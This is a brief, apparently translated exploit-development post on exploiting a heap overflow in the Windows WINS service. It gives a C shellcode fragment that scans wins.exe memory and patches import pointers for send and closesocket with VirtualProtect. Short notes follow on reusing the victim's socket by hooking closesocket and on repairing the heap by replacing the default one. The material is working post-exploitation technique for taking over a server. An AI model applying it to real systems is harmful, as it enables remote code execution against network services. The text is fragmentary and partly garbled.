How to exploit the wins Heap Overflow Vulnerability

How to exploit the wins Heap Overflow Vulnerability

 newheap=HeapCreateadd(HEAP_GENERATE_EXCEPTIONS,0x10000,0);            i=*(int *)(0x7ffdf008); // wins.exe address;             j=0;          for(k=0;k<0x30000;k+=4)    {     if(*(int *)(i+k)==sendadd)     {                VirtualProtectadd((i+k)&0xfffff000,0x1000,0x04,&l);            *(int *)(i+k)=newcalladd;       VirtualProtectadd((i+k)&0xfffff000,0x3000,l,&l);      j^=0x1;           //         break;     }     if(*(int *)(i+k)==closesocketadd)     {             VirtualProtectadd((i+k)&0xfffff000,0x1000,0x04,&l);            *(int *)(i+k)=newcalladd+5;       VirtualProtectadd((i+k)&0xfffff000,0x3000,l,&l);      j^=0x2;           //         break;     }     if(*(int *)(i+k)==((int )ptr&0xffff0000))     {             VirtualProtectadd((i+k)&0xfffff000,0x1000,0x04,&l);            *(int *)(i+k)=newheap;       VirtualProtectadd((i+k)&0xfffff000,0x3000,l,&l);      j^=0x4;           //         break;     }     if(j==7) break;    }   

1. How to reuse socket.

 

Because the server has threads that keep receiving data, the socket is to find it, and shellcode will compete with the server to receive data.

Shellcode hook closesocket, exp sends error data, the server closes the socket, The shellcode gets the socket after interception, the server does not compete for data.

2. Heap repair

Apply for a new heap to replace the default heap.